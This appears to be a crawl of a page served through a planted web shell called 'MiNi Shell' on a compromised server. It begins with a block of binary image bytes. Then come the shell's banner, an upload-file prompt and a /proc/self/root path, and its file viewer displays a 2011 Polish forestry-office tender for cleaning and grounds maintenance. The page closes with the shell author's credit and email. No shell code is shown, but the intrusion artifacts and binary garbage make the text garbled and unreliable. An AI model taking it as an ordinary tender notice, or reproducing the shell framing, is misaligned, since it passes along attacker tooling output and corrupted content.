JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111220/433002-N-2011.html

<p class="kh_header"><b>Zawadzkie: Usługi w zakresie prac porządkowych i utrzymania czystości w siedzibie Nadleśnictwa Zawadzkie i obiektach przyległych. ZG-2710-29/2011</b><br>
<b>Numer ogłoszenia: 433002 - 2011; data zamieszczenia: 20.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Zawadzkie , ul. Strzelecka 6, 47-120 Zawadzkie, woj. opolskie, tel. 077 4049656, faks 077 4049661.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.lasy.gov.pl/zawadzkie</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PGL LP.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie prac porządkowych i utrzymania czystości w siedzibie Nadleśnictwa Zawadzkie i obiektach przyległych. ZG-2710-29/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi w zakresie prac porządkowych i utrzymania czystości w siedzibie Nadleśnictwa Zawadzkie, ul. Strzelecka 6, Zawadzkie i obiektach przyległych. 
Opis pomieszczeń i obiektów: 
I.   Budynek Administracyjny Nadleśnictwa Zawadzkie
1. Pomieszczenia biurowe
	powierzchnia użytkowa 330 m2 (podłogi wyłożone wykładzinami PCV i boazerią panelową 19 m2 )
2. Korytarze  powierzchnia użytkowa 80 m 2 (podłogi wyłożone płytkami podłogowymi 30x30 cm2 - 58 m2, wykładziną PCV - 22 m2 )
3. Pomieszczenia ubikacji:
powierzchnia użytkowa 6 m2
4. Pomieszczenia piwnicy:
	powierzchnia użytkowa 75 m2 (podłogi częściowo wyłożone płytkami podłogowymi)
5. Schody drewniane ( stopnie wyłożone wykładziną PCV )
6. Pomieszczenia stara świetlica
	powierzchnia użytkowa 53 m2 (podłogi wyłożone wykładziną PCV )
7. Pomieszczenia pokojów gościnnych:
Parter: pokój  12,46 m2, kuchnia 11,35 m2, łazienka 5,56 m2, korytarz 12,31 m2, schowek 2,26m2
I piętro: pokój 13 m2 kuchnia 13 m2 ubikacja 1,5m2, łazienka 4m2, korytarz 3,5m2
8. Sala edukacyjno - konferencyjna:
a)powierzchnia użytkowa wraz z przynależnymi pomieszczeniami 175 m2 (w tym podłogi drewniane - 145 m2 )
9. Balustrada drewniana (25 m2)
II.   Izba Leśno - Przyrodnicza:
b)powierzchnia użytkowa 309 m2 (podłogi wyłożone na parterze płytami
marmurowymi 139 m2,1 piętro podłoga drewniana 170 m2, schody drewniane obłożone panelami podłogowymi)
- toalety przy Izbie Leśno - przyrodniczej o powierzchni 12,95m2 wyłożonej płytkami ceramicznymi
III.   Pomieszczenie kotłowni gazowej budynku Administracyjnego Nadleśnictwa:
c)Powierzchnia użytkowa 9,0 m2 (płytki podłogowe i ścienne )
IV.   Plac przy budynku Administracyjnym Nadleśnictwa wyłożony kostką brukowa, o powierzchni 931 m2
V. Ogród edukacyjno-przyrodniczy im. Jana Pawła II przy Nadleśnictwie Zawadzkie klomby,  trawniki oczko wodne o łącznej powierzchni 6400 m2.
VI. Letnia Leśna Izba Edukacyjno Turystyczna w Leśnictwie Dębie, około 3,5 km od siedziby Nadleśnictwa Zawadzkie, zaadaptowana budynek zabytkowej stodoły o powierzchni 220 m2 (podłoga - płyty OSB).

Opis prac do wykonania 
I.  Prace w pomieszczeniach biurowych - 18 pomieszczeń:
a.	Zakres prac związanych z utrzymaniem porządku przy sprzątaniu codziennym:
-	odkurzanie wykładzin podłogowych 
-	czyszczenie powierzchni podłogowych, wykładzin,
-	czyszczenie i wycieranie kurzu z powierzchni biurek, szaf, szafek   i innego sprzętu biurowego, pulpitów, listew ściennych itp. 
-	Opróżnienie i czyszczenie koszy na śmieci oraz wyposażenie ich we worki na śmieci, wymiana worków w miarę potrzeb
b.	Zakres prac związanych z utrzymaniem porządku przy sprzątaniu okresowym:
-	okresowe mycie okien, drzwi i pranie firan (cztery razy do roku)
-	nakładanie warstwy ochronnej na wykładziny i płytki ( w miarę potrzeb, nie rzadziej niż raz w miesiącu)
II. Prace na korytarzach i klatce schodowej :
a.	Zakres prac związanych z utrzymaniem porządku przy sprzątaniu codziennym:
-	zamiatanie, mycie, odkurzanie wykładzin , płytek i schodów
-	mycie na mokro parapetów 
-	odkurzanie (mycie na mokro) balustrad, poręczy
-	usuwanie kurzu z wszystkich sprzętów znajdujących się w sprzątanych pomieszczeniach
b.   Zakres prac związanych z utrzymaniem porządku przy sprzątaniu okresowym:
-	nakładanie warstwy ochronnej na wykładziny i płytki ( w miarę potrzeb, nie rzadziej niż raz w miesiącu)
-	okresowe mycie okien, drzwi i pranie firan (cztery razy do roku)
III. Prace w pomieszczeniach sanitarnych (biurowiec) i sanitariaty zewnętrzne przyległe do Izby Leśno-Przyrodniczej:
a.	Zakres prac związanych z utrzymaniem porządku przy sprzątaniu codziennym:
-	bieżące uzupełnianie zapasu papieru toaletowego 
-	porządkowanie i dezynfekcja toalet, czyszczenie glazury łazienkowej, armatury, luster wiszących,
-	opróżnianie i czyszczenie koszy na śmieci oraz wyposażenie ich we worki na śmieci, wymiana worków w miarę potrzeb
IV. Prace porządkowe w Izbie Leśno-Przyrodniczej ( oddzielny budynek):
a.  Zakres prac związanych z utrzymaniem porządku przy sprzątaniu codziennym i okresowym:
-	okresowe mycie okien, drzwi (cztery razy do roku)
-	zamiatanie, mycie płytek i schodów codziennie  w okresie od  01 kwietnia do 30 września, a w pozostałym okresie cztery razy w miesiącu.
-	mycie na mokro parapetów ( raz w tygodniu )
-	usuwanie kurzu z wszystkich sprzętów znajdujących się w sprzątanych pomieszczeniach ( raz w tygodniu )
-	nakładanie warstwy ochronnej na wykładziny i płytki ( w miarę potrzeb, nie rzadziej niż raz w miesiącu)
V. Prace porządkowe w Letniej Leśnej Izbie Edukacyjno Turystycznej w Leśnictwie Dębie: 
-	usuwanie kurzu i pajęczyn z wszystkich sprzętów znajdujących się w izbie (co najmniej   cztery razy do roku)
-	mycie okien (cztery razy do roku)
-	czyszczenie powierzchni podłogowych (co najmniej cztery razy do roku)
-	czyszczenie stołów i ławek znajdujących się przy izbie (co najmniej cztery razy do roku)
VI. Prace gospodarcze związane z utrzymaniem Ogrodu Edukacyjno-Przyrodniczego im. Jana Pawła II przy budynku Nadleśnictwa (arboretum): 
-	koszenie trawy przy użyciu kosiarek mechanicznych oraz kos spalinowych na wysięgniku wraz z podkaszaniem pod drzewkami ozdobnymi (koszenie 8-10 razy w sezonie na sygnał zamawiającego). Całkowita powierzchnia ogrodu wynosi 6400 m2
-	wygrabianie koszonej trawy i jej wywóz wraz utylizacja na wysypisku śmieci
-	usuwanie chwastów na skalnikach oraz  wokół oczka wodnego
-	podlewanie roślin w ogrodzie (wg potrzeb nie więcej niż 2 razy w tygodniu)
-	zapewnienie czystości i porządku w ogrodzie 
VII. Dodatkowe czynności: 
-	wynoszenie śmieci do kontenera
-	sprzątanie po remontach
-	czyszczenie boazerii okresowo 2 razy w roku
-	w okresie zimowym odśnieżanie wejść do siedziby biurowca Nadleśnictwa oraz posypywanie ich piaskiem/solą
-	w okresie zimowym odśnieżanie wjazdu na posesję oraz parkingu przy biurowcu Nadleśnictwa o powierzchni 931 m2, każdorazowo po nocnych opadach śniegu uniemożliwiających bezpieczny wjazd i parkowanie samochodów przed biurowcem Nadleśnictwa. Odśnieżanie należy zakończyć do godziny 06:30.
-	w okresie zimowym, posypywanie piaskiem i solą parkingu przy biurowcu w razie wystąpienia oblodzenia nawierzchni. 
-	zapewnienie czystości i porządku na placu wokół siedziby Nadleśnictwa oraz w ogrodzie
-	mycie placu przy nadleśnictwie urządzeniem wysokociśnieniowym z użyciem środków czyszczących dwa razy do roku.
-	grabienie i wywożenie liści z terenu ogrodu i siedziby Nadleśnictwa wraz z ich utylizacją
-	usuwanie innych nieczystości
-	zapewnienie dbania o drzewa i krzewy przy siedzibie Nadleśnictwa (w miarę potrzeb)
-	sprzątanie śmieci w pasie wzdłuż ogrodzenia biurowca Nadleśnictwa oraz minimum 30 metrów poza nim, w miarę potrzeb co najmniej raz w tygodniu.
-	inne dodatkowe czynności porządkowe zlecone przez Zamawiającego.
Czynności objęte przetargiem należy wykonywać w dni robocze od godz. 06:45 do 14:45 w godzinach pracy zamawiającego.


Środki czystości (środki chemiczne) niezbędne do należytego wykonania wszystkich w/w czynności oraz piasek i sól do posypywania wejść do biurowca oraz placu przy biurowcu w zimie oraz wszelkie narzędzia pracy zapewnia wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, ze przewiduje możliwość udzielenia zamówienia zgodnie z art. 67, ust. , pkt 1 i 5, polegających na: powtórzeniu prac będących przedmiotem zamówienia lub jego części albo zleceniu dodatkowych prac do 50% wartości zamówienia podstawowego (wartości umowy), w okresie obowiązywania umowy lub w okresie do 3 roku od udzielenia zamówienia podstawowego, w przypadku zaistnienia okoliczności warunkujących potrzebę zlecenia prac.
UWAGA: Zamawiający przewiduje możliwość zmniejszenia zakresu rzeczowego prac objętych przetargiem z powodu zaistnienia okoliczności obiektywnych warunkujących konieczność takich zmian</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że powyższy warunek został spełniony jeśli Wykonawca wykaże, iż wykonał usługi o podobnym charakterze i zakresie w ciągu ostatnich trzech lat przed wszczęciem postępowania, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie, a ich wartość brutto przeciętnie rocznie wynosiła minimum34000zł;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. kosiarki z koszem minimum 2 szt, kosy spalinowe na wysięgniku minimum 2 szt, samochód transportowy o ładowności minimum 1,5 tony, pojazd z pługiem do odśnieżania, odśnieżarka spalinowa - minimum 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten jest spełniony jeżeli Wykonawca przedstawi informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej , w którym posiada rachunek, potwierdzającą wysokość posiadanych  środków finansowych lub zdolność kredytową w wysokości nie mniejszej niż 10% wartości brutto złożonej oferty lub kilku ofert.(informacja z datą nie wcześniej niż 3 miesiące przed upływem terminu składania ofert)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	oświadczenie o braku zaległości wobec właściwego urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne (na druku oferty),
b)	wykaz podwykonawców wykonujących zamówienie (załącznik nr 5);
c)	pełnomocnictwo do reprezentowania wykonawców ubiegających się wspólnie o udzielenie niniejszego zamówienia publicznego albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.lasy.gov.pl/zawadzkie<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PGL LP Nadleśnictwo Zawadzkie
ul. Strzelecka 6
47-120 Zawadzkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.12.2011 godzina 09:00, miejsce: PGL LP Nadleśnictwo Zawadzkie
ul. Strzelecka 6
47-120 Zawadzkie
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com